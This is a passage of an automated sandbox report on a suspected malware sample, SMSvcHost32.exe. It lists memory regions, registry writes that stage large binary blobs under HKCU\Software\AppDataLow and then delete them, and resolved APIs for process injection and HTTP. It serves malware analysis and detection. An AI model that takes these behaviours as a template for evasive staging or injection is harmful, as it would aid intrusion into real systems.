|
|
- |
| iertutil.dll | 0x721f0000 | 0x724bafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74330000 | 0x7434afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74770000 | 0x747b3fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74aa0000 | 0x74b1afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74b20000 | 0x74b64fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x74b70000 | 0x75068fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75120000 | 0x7651efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x766e0000 | 0x766eefff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76b60000 | 0x76bf1fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x76c00000 | 0x76c41fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76ec0000 | 0x76ef6fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x77050000 | 0x771c7fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x771d0000 | 0x772bafff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x772c0000 | 0x772c5fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x772d0000 | 0x772ddfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77310000 | 0x77393fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77400000 | 0x7748cfff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x77490000 | 0x774a2fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x774b0000 | 0x774b6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77760000 | 0x7776bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 44 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (7)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
2 |
Registry (137)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
3 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
10 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = DigitalProductId, data = 164 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = InstallDate, data = 63 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyOverride |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoDetect |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyOverride |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoDetect |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_1, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_2, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_3, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_4, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_5, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_6, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_7, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_8, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0, size = 512000, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_1, size = 512000, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_2, size = 512000, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_3, size = 512000, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_4, size = 512000, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_5, size = 512000, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_6, size = 512000, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_7, size = 350258, type = REG_BINARY |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_0 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_1 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_2 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_3 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_4 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_5 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_6 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_7 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_8 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_9 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_10 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_11 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_12 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_13 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_14 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_15 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_16 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_17 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_18 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_19 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_20 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_21 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_22 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_23 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_24 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_25 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_26 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_27 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_28 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_29 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_30 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_31 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_32 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_33 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_34 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_35 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_36 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_37 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_38 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_39 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_40 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_41 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_42 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_43 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_44 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_45 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_46 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_47 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_48 |
|
1 | |
| Delete Value | HKEY_CURRENT_USER\Software\AppDataLow | value_name = gpscsdch_49 |
|
1 |
Module (661)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x765a0000 |
|
1 | |
| Load | k | base_address = 0x0 |
|
1 | |
| Load | eappcfg.dll | base_address = 0x6ffa0000 |
|
1 | |
| Load | Kernel32.dll | base_address = 0x765a0000 |
|
1 | |
| Load | WININET.dll | base_address = 0x702b0000 |
|
1 | |
| Load | PSAPI.DLL | base_address = 0x772c0000 |
|
1 | |
| Load | USERENV.dll | base_address = 0x701e0000 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x746c0000 |
|
1 | |
| Load | WINHTTP.dll | base_address = 0x70210000 |
|
1 | |
| Load | NETAPI32.dll | base_address = 0x77490000 |
|
1 | |
| Load | Secur32.dll | base_address = 0x6ff60000 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x75120000 |
|
2 | |
| Load | ole32.dll | base_address = 0x771d0000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77960000 |
|
5 | |
| Load | WinSCard.dll | base_address = 0x6fe20000 |
|
1 | |
| Load | WINMM.dll | base_address = 0x6fdc0000 |
|
1 | |
| Load | powrprof.dll | base_address = 0x74770000 |
|
1 | |
| Load | user32.dll | base_address = 0x77810000 |
|
1 | |
| Load | ADVAPI32.DLL | base_address = 0x74aa0000 |
|
1 | |
| Load | KERNEL32.DLL | base_address = 0x765a0000 |
|
1 | |
| Load | NETAPI32.DLL | base_address = 0x77490000 |
|
1 | |
| Load | USER32.DLL | base_address = 0x77810000 |
|
1 | |
| Load | iphlpapi.dll | base_address = 0x71d30000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x74aa0000 |
|
1 | |
| Get Handle | WININET.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\shlwapi.dll | base_address = 0x74b20000 |
|
2 | |
| Get Handle | PSAPI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77960000 |
|
6 | |
| Get Handle | USERENV.dll | base_address = 0x0 |
|
1 | |
| Get Handle | WS2_32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | WINHTTP.dll | base_address = 0x0 |
|
1 | |
| Get Handle | NETAPI32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x765a0000 |
|
7 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x77810000 |
|
2 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x74aa0000 |
|
2 | |
| Get Handle | Secur32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | SHELL32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | ole32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | base_address = 0x400000 |
|
5 | |
| Get Handle | c:\windows\syswow64\psapi.dll | base_address = 0x772c0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ws2_32.dll | base_address = 0x746c0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\gdi32.dll | base_address = 0x76f00000 |
|
1 | |
| Get Handle | WinSCard.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\shell32.dll | base_address = 0x75120000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x771d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\wininet.dll | base_address = 0x702b0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\crypt32.dll | base_address = 0x77050000 |
|
1 | |
| Get Handle | c:\windows\syswow64\netapi32.dll | base_address = 0x77490000 |
|
1 | |
| Get Handle | c:\windows\syswow64\iphlpapi.dll | base_address = 0x71d30000 |
|
1 | |
| Get Handle | WINMM.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\userenv.dll | base_address = 0x701e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x76b60000 |
|
1 | |
| Get Filename | ole32.dll | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Get Filename | WINMM.dll | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Get Filename | WINMM.dll | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 520 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77992bd0 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x765b1ba0 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x765c5eb0 |
|
3 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpQueryInfoA, address_out = 0x70351880 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetQueryOptionA, address_out = 0x70357d00 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetSetOptionA, address_out = 0x70351dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x7032c3f0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetCloseHandle, address_out = 0x7037d200 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpSendRequestA, address_out = 0x70378e60 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetConnectA, address_out = 0x703f0da0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetReadFile, address_out = 0x70337320 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersW, address_out = 0x7032bec0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenW, address_out = 0x70378490 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpOpenRequestW, address_out = 0x70330fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFindFileNameW, address_out = 0x74b37a50 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCatW, address_out = 0x74b484a0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCpyW, address_out = 0x74b484e0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCmpIW, address_out = 0x74b34750 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCpyNW, address_out = 0x74b433f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrA, address_out = 0x74b43570 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrDupW, address_out = 0x74b39060 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrIW, address_out = 0x74b381b0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrRChrW, address_out = 0x74b3d1c0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCmpW, address_out = 0x74b35fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetProcessImageFileNameA, address_out = 0x772c16a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = _chkstk, address_out = 0x779da570 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlAllocateHeap, address_out = 0x77992bd0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlFreeHeap, address_out = 0x77990230 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memset, address_out = 0x779dcfe0 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = CreateEnvironmentBlock, address_out = 0x701e4480 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = GetProfilesDirectoryW, address_out = 0x701e45a0 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = DestroyEnvironmentBlock, address_out = 0x701e4510 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 52, address_out = 0x746f1110 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 2, address_out = 0x746d3230 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 3, address_out = 0x746cead0 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 11, address_out = 0x746c5240 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 23, address_out = 0x746ce6b0 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 15, address_out = 0x746c4a90 |
|
2 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 115, address_out = 0x746c6520 |
|
2 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpQueryDataAvailable, address_out = 0x702347a0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpReceiveResponse, address_out = 0x7021c8e0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpOpen, address_out = 0x70246720 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpAddRequestHeaders, address_out = 0x70229400 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpQueryHeaders, address_out = 0x702309c0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpReadData, address_out = 0x70234ea0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpOpenRequest, address_out = 0x70248dd0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpSetOption, address_out = 0x702306f0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpCloseHandle, address_out = 0x70233ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpSendRequest, address_out = 0x7023bfd0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpConnect, address_out = 0x70242880 |
|
1 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
2 | |
| Get Address | c:\windows\syswow64\netapi32.dll | function = NetUserGetInfo, address_out = 0x6ff733a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtectEx, address_out = 0x765e2790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAllocEx, address_out = 0x765e2730 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsBadReadPtr, address_out = 0x765b2510 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x765baba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateMutexW, address_out = 0x765c66f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32NextW, address_out = 0x765bd290 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Process32FirstW, address_out = 0x765bf5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeThread, address_out = 0x765c4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteProcessMemory, address_out = 0x765e2850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalMemoryStatusEx, address_out = 0x765bafe0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenMutexW, address_out = 0x765c6770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x765b2ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersionExW, address_out = 0x765baa80 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageA, address_out = 0x765bf830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpiA, address_out = 0x765b7830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileAttributesW, address_out = 0x765c6a50 |
|
1 | |
